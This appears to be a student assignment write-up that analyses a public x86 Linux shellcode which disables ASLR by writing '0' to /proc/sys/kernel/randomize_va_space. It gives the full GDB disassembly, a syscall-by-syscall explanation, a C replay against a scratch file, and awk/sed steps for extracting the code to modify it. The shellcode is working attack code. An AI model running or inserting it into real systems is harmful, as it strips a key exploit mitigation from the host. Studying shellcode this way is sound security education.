6.C.1. Assignment

2. ASLR deactivation

This time we’ll be analysing an ASLR-deactivation shellcode found on shell-storm.org. It writes a single "0" into /proc/sys/kernel/randomize_va_space, which switches address-space layout randomisation off system-wide (the write only succeeds when running as root).

Compiling the original file:
A warning pops up (an implicit declaration of strlen, i.e. a missing #include <string.h> in the wrapper); we ignore it for now:

$ ../compile_c.sh c_linx86_aslr-disable_shellstorm_sample2_original
[+] Compiling ... 
c_linx86_aslr-disable_shellstorm_sample2_original.c: In function ‘main’:
c_linx86_aslr-disable_shellstorm_sample2_original.c:55:33: warning: incompatible implicit declaration of built-in function ‘strlen’ [enabled by default]
[+] Done!

Debugging in GDB:

$ gdb -q ./c_linx86_aslr-disable_shellstorm_sample2_original
Reading symbols from /home/vbox/exam/assignment_6/c_linx86_aslr-disable_shellstorm_sample2_original...(no debugging symbols found)...done.

Setting a breakpoint on the address of the shellcode buffer:

gdb-peda$ b *&shellcode
Breakpoint 1 at 0x804a040
gdb-peda$ r

Printing out the code part, then writing it to a file:

We dump the 28 instructions that make up the shellcode buffer. Reading ahead: the nine pushes (after push eax supplies the terminating NUL) lay the string //proc/sys/kernel/randomize_va_space out on the stack, the code then calls syscall 8 (creat) on it with the mode value 0x2bc, writes one byte (the '0' of the word 0x3a30) through syscall 4 (write), closes the descriptor with syscall 6 (close) and exits through syscall 1 (close returns 0, and inc eax turns that into the exit number).

gdb-peda$ x/28i &shellcode
=> 0x804a040 <shellcode>:	xor    eax,eax
   0x804a042 <shellcode+2>:	push   eax
   0x804a043 <shellcode+3>:	push   0x65636170
   0x804a048 <shellcode+8>:	push   0x735f6176
   0x804a04d <shellcode+13>:	push   0x5f657a69
   0x804a052 <shellcode+18>:	push   0x6d6f646e
   0x804a057 <shellcode+23>:	push   0x61722f6c
   0x804a05c <shellcode+28>:	push   0x656e7265
   0x804a061 <shellcode+33>:	push   0x6b2f7379
   0x804a066 <shellcode+38>:	push   0x732f636f
   0x804a06b <shellcode+43>:	push   0x72702f2f
   0x804a070 <shellcode+48>:	mov    ebx,esp
   0x804a072 <shellcode+50>:	mov    cx,0x2bc
   0x804a076 <shellcode+54>:	mov    al,0x8
   0x804a078 <shellcode+56>:	int    0x80
   0x804a07a <shellcode+58>:	mov    ebx,eax
   0x804a07c <shellcode+60>:	push   eax
   0x804a07d <shellcode+61>:	mov    dx,0x3a30
   0x804a081 <shellcode+65>:	push   dx
   0x804a083 <shellcode+67>:	mov    ecx,esp
   0x804a085 <shellcode+69>:	xor    edx,edx
   0x804a087 <shellcode+71>:	inc    edx
   0x804a088 <shellcode+72>:	mov    al,0x4
   0x804a08a <shellcode+74>:	int    0x80
   0x804a08c <shellcode+76>:	mov    al,0x6
   0x804a08e <shellcode+78>:	int    0x80
   0x804a090 <shellcode+80>:	inc    eax
   0x804a091 <shellcode+81>:	int    0x80
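
To check this reading of the disassembly, here is an added C example (it is not from the page or from the shell-storm author) that rebuilds the string from the pushed immediates exactly as it lies in memory and replays the same creat/write/close sequence through libc against a scratch file instead of the real sysctl. The scratch path and the read-back helper are assumptions for the demonstration; the i386 syscall numbers from the listing appear only in comments, since open(2)/write(2)/close(2) map to the right numbers on whatever host you compile on.

```c
/* Added example: decode the string the shellcode builds on the stack and
 * replay its syscall sequence against a scratch file (not the real sysctl). */
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The nine immediates in the order the shellcode pushes them, taken from
 * the listing (the preceding "push eax" with eax = 0 supplies the NUL). */
static const uint32_t pushed[] = {
    0x65636170, 0x735f6176, 0x5f657a69, 0x6d6f646e, 0x61722f6c,
    0x656e7265, 0x6b2f7379, 0x732f636f, 0x72702f2f,
};

/* Rebuild the string as it lies in memory: the stack grows down, so the
 * last push ends up at the lowest address, and each dword is little-endian.
 * Returns the string length (without the NUL). */
size_t decode_pushed_path(char *out, size_t outlen)
{
    size_t n = sizeof pushed / sizeof pushed[0];
    size_t pos = 0;
    for (size_t i = n; i-- > 0 && pos + 4 < outlen;) {
        uint32_t v = pushed[i];
        out[pos++] = (char)(v & 0xff);
        out[pos++] = (char)((v >> 8) & 0xff);
        out[pos++] = (char)((v >> 16) & 0xff);
        out[pos++] = (char)((v >> 24) & 0xff);
    }
    out[pos] = '\0';
    return pos;
}

/* Replay the shellcode's syscall sequence against `target`.
 * Returns 0 on success, -1 on failure. */
int replay_aslr_disable(const char *target)
{
    /* mov cx,0x2bc ; mov al,0x8 ; int 0x80  ->  creat(path, 0x2bc)
     * creat() is open() with O_WRONLY|O_CREAT|O_TRUNC. */
    int fd = open(target, O_WRONLY | O_CREAT | O_TRUNC, 0x2bc);
    if (fd < 0)
        return -1;
    /* mov dx,0x3a30 ; push dx ; mov ecx,esp ; edx = 1 ; mov al,0x4
     * ->  write(fd, "0:", 1): only the first byte, '0', is written. */
    const char buf[2] = { 0x30, 0x3a };
    if (write(fd, buf, 1) != 1) {
        close(fd);
        return -1;
    }
    /* mov al,0x6 ; int 0x80  ->  close(fd); the real shellcode then does
     * inc eax (0 -> 1) and int 0x80, i.e. exit(0). */
    return close(fd);
}

/* Read back what the replay wrote. The shellcode's mode argument is
 * 0x2bc = decimal 700 = octal 01274, i.e. owner write-only on a freshly
 * created file (irrelevant for the existing /proc entry, where the mode
 * is ignored), so the scratch file is made readable first. */
ssize_t read_back(const char *target, char *buf, size_t len)
{
    if (chmod(target, S_IRUSR | S_IWUSR) != 0)
        return -1;
    int fd = open(target, O_RDONLY);
    if (fd < 0)
        return -1;
    ssize_t n = read(fd, buf, len);
    close(fd);
    return n;
}

int main(void)
{
    char path[64];
    decode_pushed_path(path, sizeof path);
    printf("pushed string : %s\n", path);

    /* Scratch target (an assumption for the demo). Point it at the real
     * path only as root and only if you actually want ASLR disabled. */
    const char *target = "/tmp/aslr_replay_demo";
    if (replay_aslr_disable(target) != 0) {
        perror("replay");
        return 1;
    }
    char back[8] = { 0 };
    ssize_t n = read_back(target, back, sizeof back - 1);
    printf("wrote %zd byte(s) to %s: \"%s\"\n", n, target, back);
    return 0;
}
```

Running it as an unprivileged user is enough to confirm the interpretation; the only difference from the real shellcode is the target path and the fact that the mode argument matters for a new file but not for the existing sysctl entry.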

Using GDB's logging to write the listing to a file:

gdb-peda$ set logging file gdb_linx86_aslr-disable-shellstorm_sample2.txt
gdb-peda$ set logging on
Redirecting output to gdb_linx86_aslr-disable-shellstorm_sample2.txt.
gdb-peda$ x/28i &shellcode
gdb-peda$ set logging off
Done logging to gdb_linx86_aslr-disable-shellstorm_sample2.txt.

AWK’ing the created file

Using yet again some AWK and sed magic: awk keeps everything from the third whitespace-separated field onwards, which drops the address and the <shellcode+N>: label on every line, and sed removes the <shellcode>: label that survives on the first line because its fields are shifted by the "=>" current-instruction marker.

$ awk '{print substr($0, index($0, $3))}' gdb_linx86_aslr-disable-shellstorm_sample2.txt | sed -e 's/<shellcode>:\t//' 
xor    eax,eax
push   eax
push   0x65636170
push   0x735f6176
push   0x5f657a69
push   0x6d6f646e
push   0x61722f6c
push   0x656e7265
push   0x6b2f7379
push   0x732f636f
push   0x72702f2f
mov    ebx,esp
mov    cx,0x2bc
mov    al,0x8
int    0x80
mov    ebx,eax
push   eax
mov    dx,0x3a30
push   dx
mov    ecx,esp
xor    edx,edx
inc    edx
mov    al,0x4
int    0x80
mov    al,0x6
int    0x80
inc    eax
int    0x80

$ awk '{print substr($0, index($0, $3))}' gdb_linx86_aslr-disable-shellstorm_sample2.txt | sed -e 's/<shellcode>:\t//' > asm_linx86_aslr-disable_shellstorm_sample2.asm

Copying it for our own modifications:

$ cp asm_linx86_aslr-disable_shellstorm_sample2.asm asm_linx86_aslr-disable_shellstorm_sample2-alt.asm